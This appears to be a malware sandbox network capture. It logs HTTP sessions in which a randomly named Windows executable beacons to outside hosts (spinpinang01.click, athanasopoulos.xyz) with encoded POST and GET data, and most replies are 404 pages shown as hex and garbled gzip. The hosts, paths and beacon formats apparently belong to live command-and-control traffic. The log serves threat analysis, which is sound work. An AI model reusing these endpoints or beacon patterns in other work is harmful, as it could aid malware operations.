51 3d 3d Data Ascii: 0lTTc=My1WNoSFbjGGJEZYljyt4gxKpeig40Jsnb7C6zJe+vAHGgO7E71M9PjbxCAS7JH4NavOnUv2TezU8EoXjzp8Koo1Vk6Lii1CiyQ4rru05iCuT+z9TL2krLudMsyRNGqo9Cv6WMs+zjzhl4ZQ6VKYPpCpMhlrSyXdgCHkxHFVn4QBGD0l3khBNCZz9fqJcO3AVgyQZe6/nmLeAPpTFQ==
Jan 11, 2025 02:54:26.896034956 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Sat, 11 Jan 2025 01:54:26 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 [TRUNCATED] Data Ascii: 1350ZrHr?OAa{7j$zIq'q~ JjQliudee~YY?qve o=\|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s(^n/^9~$O~nUh[_[_~\Vgay~0S>pC?WJ`E8+]icpXn9N0}/]8zV<cbgvNLdU~Y?}"x;W<KK>Lre/meeUu7/yV? Gyg*"Sw{f"!=z`@\Wh-yFgj]#C:rw$aG?Rh}VUY0x;l/+,+I+^kga\[NFa>Aev]~>l?Z+=$7~#EF7--L/>eu+=SwU+g^Wo<[^{;\4ml[zc7/hK13;0[5~?u{>/q)z9^GYF"?V'KA{dK71>j#W{}>Lns=C 8.#m\u~p^
Jan 11, 2025 02:54:26.896056890 CET	1236	IN	Data Raw: e6 8c 4f 08 94 c0 df d4 f0 c6 cf df 12 d7 09 ad c1 9f 12 e0 48 5f 14 33 1a 52 79 f7 e7 9b 6d 6e 51 7b 33 dc 0b 2f cf ca 4b 84 7a 18 14 6e 0c 7c 5d 73 63 80 fd 9c de 63 01 fb 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab f8 74 41 f6 b3 5d bf 9f f7 c6 Data Ascii: OH_3RymnQ{3/Kzn\|]scciA8nR?tA]~H?Uo(^<nWD[z?khq]A;gT<kW{?BSgx!kbU7/tX7er^o>z
Jan 11, 2025 02:54:26.896066904 CET	1236	IN	Data Raw: df b1 01 bf 0d 17 25 3e 9e c3 92 d9 86 8b 4e 17 7d 97 9f d9 c9 5e 96 c6 b6 2d ea ac d3 19 ae 69 a5 93 5c 9b ca 8c c1 49 93 ae 45 ed 60 1a 32 74 96 44 67 bc 23 f0 18 4a eb 8d 90 6c 82 48 2b 11 6b 68 8e 4c 71 ed 8e 46 58 82 56 bb d8 60 f8 60 26 8d Data Ascii: %>N}^-i\IE`2tDg#JlH+khLqFXV``&aZyj<.[!S!]&h#l<+hBWl1.-><qM#1;j8snh-Hgfp8RAo0<It9#1KG8DQx)rBFY(XYlL$A%iV$-
Jan 11, 2025 02:54:26.896079063 CET	1236	IN	Data Raw: 9e 98 63 67 b4 21 80 51 ab 4c d3 9e 8f 8b b8 5e 35 01 c7 ac 19 cc 22 a4 53 07 13 46 37 2f 3a ca cf 4e f6 06 31 78 7f 41 9c b0 39 2e 42 46 4c 6e 25 98 68 32 7b 58 ec 22 1a 67 f2 06 4f 0f de 12 4e 03 7d 44 a1 c0 35 2b c3 8a 58 b8 9b 4e eb ea 28 f5 Data Ascii: cg!QL^5"SF7/:N1xA9.BFLn%h2{X"gON}D5+XN()ZUb]s,h,GHj'0<fsVx3<Og9)Q4vdil4G/z(TRul+Tl2:3pcsreB'4<F]dPvZOZ.it
Jan 11, 2025 02:54:26.896090031 CET	292	IN	Data Raw: bb 98 67 63 7b 4b 35 df 0d e0 9f 90 bf 3a d4 75 72 f9 93 b3 5c b3 ff 31 64 3f 43 d4 9f 5e 20 f5 e7 4f 45 71 39 ed 7b 45 5e 6f f7 3c fc 47 e2 02 b2 7c 27 81 67 39 dd 7d 7b 84 3f 5b f5 08 7f a4 9b 1b 34 7d c0 d7 95 63 78 65 f1 f1 b9 a0 f7 5e da bf Data Ascii: gc{K5:ur\1d?C^ OEq9{E^o<G\|'g9}{?[4}cxe^W#q=@VU2}zn_2V'3!`O}HGV[<$p$-o\|g>~/)~g0eCVovM3dKQ:\S@ej

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49982	66.29.146.78	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:28.867861986 CET	1714	OUT	POST /01kd/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.spinpinang01.click Origin: http://www.spinpinang01.click Referer: http://www.spinpinang01.click/01kd/ Content-Type: application/x-www-form-urlencoded Content-Length: 1230 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 4d 79 31 57 4e 6f 53 46 62 6a 47 47 4a 45 5a 59 6c 6a 79 74 34 67 78 4b 70 65 69 67 34 30 4a 73 6e 62 37 43 36 7a 4a 65 2b 76 59 48 47 79 47 37 46 61 31 4d 38 50 6a 62 2f 69 41 52 37 4a 48 66 4e 61 33 43 6e 55 7a 6d 54 63 37 55 38 6c 49 58 76 57 64 38 46 6f 6f 31 58 6b 36 47 6d 69 30 59 69 79 41 38 72 72 2b 30 35 69 43 75 54 34 2f 39 46 71 32 6b 73 37 75 65 4c 73 79 72 61 57 71 45 39 43 32 46 57 4d 6f 45 7a 58 50 68 72 34 4a 51 71 33 53 59 4d 4a 43 72 5a 68 6c 7a 53 79 61 44 67 44 72 2f 78 45 59 36 6e 2f 6b 42 46 56 64 50 77 56 42 47 54 6a 35 46 35 66 36 76 66 71 37 35 66 52 48 57 5a 2f 32 34 33 53 65 74 57 74 38 4c 5a 74 6c 30 50 48 75 53 51 63 58 35 4d 75 4f 76 30 58 51 66 69 7a 34 61 38 79 4f 73 7a 43 30 41 76 77 5a 67 75 30 61 78 6f 79 57 4d 53 39 7a 54 37 34 47 46 77 75 6f 54 46 35 4c 34 67 72 31 59 41 6a 6a 76 35 39 53 33 4c 39 4a 49 4b 77 73 53 58 66 4d 4f 6c 69 53 34 49 39 4b 58 78 73 65 7a 41 63 48 51 57 2f 4e 72 4c 55 75 53 6e 4a 4e 56 61 74 55 79 63 31 46 34 58 6c 42 41 [TRUNCATED] Data Ascii: 0lTTc=My1WNoSFbjGGJEZYljyt4gxKpeig40Jsnb7C6zJe+vYHGyG7Fa1M8Pjb/iAR7JHfNa3CnUzmTc7U8lIXvWd8Foo1Xk6Gmi0YiyA8rr+05iCuT4/9Fq2ks7ueLsyraWqE9C2FWMoEzXPhr4JQq3SYMJCrZhlzSyaDgDr/xEY6n/kBFVdPwVBGTj5F5f6vfq75fRHWZ/243SetWt8LZtl0PHuSQcX5MuOv0XQfiz4a8yOszC0AvwZgu0axoyWMS9zT74GFwuoTF5L4gr1YAjjv59S3L9JIKwsSXfMOliS4I9KXxsezAcHQW/NrLUuSnJNVatUyc1F4XlBAc2BQZKZrYDtrq3vAbkwufbyKOUwglndKBa8dOW5hbn4TV5JJJ2q8MepRP3OmNAbaVYD9sZZkv6ciJc8C7JEJQdaZ5KRB8XkjBrYqP52iTMxIkAKEFJeZj35pG/4DvH2sFN/I23u5OQpJBw3W8EFEtyNV2CN1Vyju7j0NLk5NNXNWb7S7NAuuO2mAIEWFK9A4gwNpQCegACJgq7JqJOYOJCoeaC2VkzVXSsY8tSpLHQXsy9bqO5TI2ga3Ph7cp7YOQPAcMmYdM7S/2upVDf3VLcp1Rkk2mZWUysd3jXFGRlpBDyzoDmV7BKy9Lh2clfHrAc10SIighV+OBX5RcYxPSC+CCBjR24MrFcWOrr3Rch8+Oh8vsqUiHOPvufwpjVeTd6rzEjLpb+NCvqFJhAuffDi6QQx2QV51dJsJ5Ii6qz4tvtLaWokbYpdfYQVk8poi5JBqIU5UK8+zMzbSsnIhuaaNBkyW+Eaup2b/jbPvZy4EPwEk+egEwn9DPoYpO5VRqxQeCpHPEvrNhgu0Fz9IzuaBNeYVy4IHDhPT1xRaeQXwbxHjBQeB+OImG2rYfbP1NAlwt6uZmQVIxhVkg1M+U7s3fC/RF8BFql5lTcmwjIWh4zb5e0eTZc75LUv/KX3ErWLalWKenslbFz0oNbQiBQ5l82Ei+T6Hh9 [TRUNCATED]
Jan 11, 2025 02:54:29.465712070 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Sat, 11 Jan 2025 01:54:29 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 [TRUNCATED] Data Ascii: 1350ZrHr?OAa{7j$zIq'q~ JjQliudee~YY?qve o=\|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s(^n/^9~$O~nUh[_[_~\Vgay~0S>pC?WJ`E8+]icpXn9N0}/]8zV<cbgvNLdU~Y?}"x;W<KK>Lre/meeUu7/yV? Gyg*"Sw{f"!=z`@\Wh-yFgj]#C:rw$aG?Rh}VUY0x;l/+,+I+^kga\[NFa>Aev]~>l?Z+=$7~#EF7--L/>eu+=SwU+g^Wo<[^{;\4ml[zc7/hK13;0[5~?u{>/q)z9^GYF"?V'KA{dK71>j#W{}>Lns=C 8.#m\u~p^
Jan 11, 2025 02:54:29.465744019 CET	1236	IN	Data Raw: e6 8c 4f 08 94 c0 df d4 f0 c6 cf df 12 d7 09 ad c1 9f 12 e0 48 5f 14 33 1a 52 79 f7 e7 9b 6d 6e 51 7b 33 dc 0b 2f cf ca 4b 84 7a 18 14 6e 0c 7c 5d 73 63 80 fd 9c de 63 01 fb 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab f8 74 41 f6 b3 5d bf 9f f7 c6 Data Ascii: OH_3RymnQ{3/Kzn\|]scciA8nR?tA]~H?Uo(^<nWD[z?khq]A;gT<kW{?BSgx!kbU7/tX7er^o>z
Jan 11, 2025 02:54:29.465749979 CET	1236	IN	Data Raw: df b1 01 bf 0d 17 25 3e 9e c3 92 d9 86 8b 4e 17 7d 97 9f d9 c9 5e 96 c6 b6 2d ea ac d3 19 ae 69 a5 93 5c 9b ca 8c c1 49 93 ae 45 ed 60 1a 32 74 96 44 67 bc 23 f0 18 4a eb 8d 90 6c 82 48 2b 11 6b 68 8e 4c 71 ed 8e 46 58 82 56 bb d8 60 f8 60 26 8d Data Ascii: %>N}^-i\IE`2tDg#JlH+khLqFXV``&aZyj<.[!S!]&h#l<+hBWl1.-><qM#1;j8snh-Hgfp8RAo0<It9#1KG8DQx)rBFY(XYlL$A%iV$-
Jan 11, 2025 02:54:29.465754032 CET	1236	IN	Data Raw: 9e 98 63 67 b4 21 80 51 ab 4c d3 9e 8f 8b b8 5e 35 01 c7 ac 19 cc 22 a4 53 07 13 46 37 2f 3a ca cf 4e f6 06 31 78 7f 41 9c b0 39 2e 42 46 4c 6e 25 98 68 32 7b 58 ec 22 1a 67 f2 06 4f 0f de 12 4e 03 7d 44 a1 c0 35 2b c3 8a 58 b8 9b 4e eb ea 28 f5 Data Ascii: cg!QL^5"SF7/:N1xA9.BFLn%h2{X"gON}D5+XN()ZUb]s,h,GHj'0<fsVx3<Og9)Q4vdil4G/z(TRul+Tl2:3pcsreB'4<F]dPvZOZ.it
Jan 11, 2025 02:54:29.465756893 CET	292	IN	Data Raw: bb 98 67 63 7b 4b 35 df 0d e0 9f 90 bf 3a d4 75 72 f9 93 b3 5c b3 ff 31 64 3f 43 d4 9f 5e 20 f5 e7 4f 45 71 39 ed 7b 45 5e 6f f7 3c fc 47 e2 02 b2 7c 27 81 67 39 dd 7d 7b 84 3f 5b f5 08 7f a4 9b 1b 34 7d c0 d7 95 63 78 65 f1 f1 b9 a0 f7 5e da bf Data Ascii: gc{K5:ur\1d?C^ OEq9{E^o<G\|'g9}{?[4}cxe^W#q=@VU2}zn_2V'3!`O}HGV[<$p$-o\|g>~/)~g0eCVovM3dKQ:\S@ej

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49983	66.29.146.78	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:31.406265020 CET	401	OUT	GET /01kd/?0lTTc=Bwd2OemdLjmJMGV3rhrX5wcyn7e37k0HlZ2ImklC1ZcabiHtTZNjzLKNphAXpIzoErDL03bbR9rC7Ulfl1FOK5c2VAGA3RdE9RsClYyfxzqaNIzCHQ==&LR=KBvPk HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.spinpinang01.click Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Jan 11, 2025 02:54:32.005224943 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Sat, 11 Jan 2025 01:54:31 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Jan 11, 2025 02:54:32.005242109 CET	224	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
Jan 11, 2025 02:54:32.005254030 CET	1236	IN	Data Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
Jan 11, 2025 02:54:32.005268097 CET	1236	IN	Data Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
Jan 11, 2025 02:54:32.005279064 CET	1236	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
Jan 11, 2025 02:54:32.005290985 CET	1236	IN	Data Raw: 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 Data Ascii: 8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfE
Jan 11, 2025 02:54:32.005309105 CET	1236	IN	Data Raw: 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e Data Ascii: MgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsR
Jan 11, 2025 02:54:32.005326033 CET	1120	IN	Data Raw: 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 Data Ascii: 8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDR
Jan 11, 2025 02:54:32.005341053 CET	1236	IN	Data Raw: 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 Data Ascii: status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this error screen to www.spinpinang01.click's <a href="mailto:hosting-notifications.com?subject=Error message []
Jan 11, 2025 02:54:32.005352974 CET	350	IN	Data Raw: 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 34 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 Data Ascii: ogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49984	84.32.84.32	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:37.099807978 CET	677	OUT	POST /c3ib/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.athanasopoulos.xyz Origin: http://www.athanasopoulos.xyz Referer: http://www.athanasopoulos.xyz/c3ib/ Content-Type: application/x-www-form-urlencoded Content-Length: 194 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 59 63 39 7a 74 49 37 2f 73 55 6b 74 6f 44 31 4c 41 66 73 39 65 32 58 49 69 6f 38 2b 61 72 50 68 4a 30 75 78 65 5a 6b 35 48 70 63 41 30 50 63 54 36 4d 71 32 4f 76 32 64 2b 31 39 4d 73 78 52 52 43 64 36 57 31 31 5a 35 4b 71 6f 45 71 53 74 74 34 41 7a 41 54 4d 34 32 4a 43 69 34 77 69 4f 75 51 53 6c 38 31 37 6d 38 32 6b 2b 66 52 44 42 78 75 77 66 42 6f 53 64 53 7a 6b 73 39 70 66 63 47 6e 4f 49 49 34 65 4e 6f 69 32 33 37 51 58 4b 63 46 77 79 67 4d 34 6e 52 6c 46 6b 4c 73 7a 75 39 30 35 63 30 54 6a 6a 57 50 48 4d 49 32 56 62 62 56 4a 34 44 4c 65 4d 70 2b 53 6d 64 Data Ascii: 0lTTc=Yc9ztI7/sUktoD1LAfs9e2XIio8+arPhJ0uxeZk5HpcA0PcT6Mq2Ov2d+19MsxRRCd6W11Z5KqoEqStt4AzATM42JCi4wiOuQSl817m82k+fRDBxuwfBoSdSzks9pfcGnOII4eNoi237QXKcFwygM4nRlFkLszu905c0TjjWPHMI2VbbVJ4DLeMp+Smd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49985	84.32.84.32	80	6248	C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:54:39.646497965 CET	701	OUT	POST /c3ib/ HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.athanasopoulos.xyz Origin: http://www.athanasopoulos.xyz Referer: http://www.athanasopoulos.xyz/c3ib/ Content-Type: application/x-www-form-urlencoded Content-Length: 218 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36 Data Raw: 30 6c 54 54 63 3d 59 63 39 7a 74 49 37 2f 73 55 6b 74 6e 44 6c 4c 54 73 30 39 4f 6d 58 48 74 49 38 2b 50 62 4f 6f 4a 30 79 78 65 63 41 58 45 62 49 41 30 71 34 54 37 4e 71 32 4c 76 32 64 78 56 39 46 78 42 52 59 43 64 32 6b 31 77 68 35 4b 71 73 45 71 57 39 74 34 7a 4c 42 52 63 34 30 63 53 69 2b 75 53 4f 75 51 53 6c 38 31 37 6a 6e 32 67 53 66 52 54 78 78 6f 6c 7a 43 67 79 64 52 30 6b 73 39 74 66 63 43 6e 4f 49 50 34 66 41 4e 69 79 48 37 51 56 43 63 46 46 47 68 43 34 6d 61 68 46 6c 79 76 44 50 49 75 72 6f 56 65 41 48 38 51 78 74 68 34 55 6d 63 45 59 5a 55 59 70 51 6e 77 55 54 33 71 4e 68 32 66 35 70 2f 72 4c 44 6c 45 78 79 75 59 30 79 49 72 77 3d 3d Data Ascii: 0lTTc=Yc9ztI7/sUktnDlLTs09OmXHtI8+PbOoJ0yxecAXEbIA0q4T7Nq2Lv2dxV9FxBRYCd2k1wh5KqsEqW9t4zLBRc40cSi+uSOuQSl817jn2gSfRTxxolzCgydR0ks9tfcCnOIP4fANiyH7QVCcFFGhC4mahFlyvDPIuroVeAH8Qxth4UmcEYZUYpQnwUT3qNh2f5p/rLDlExyuY0yIrw==

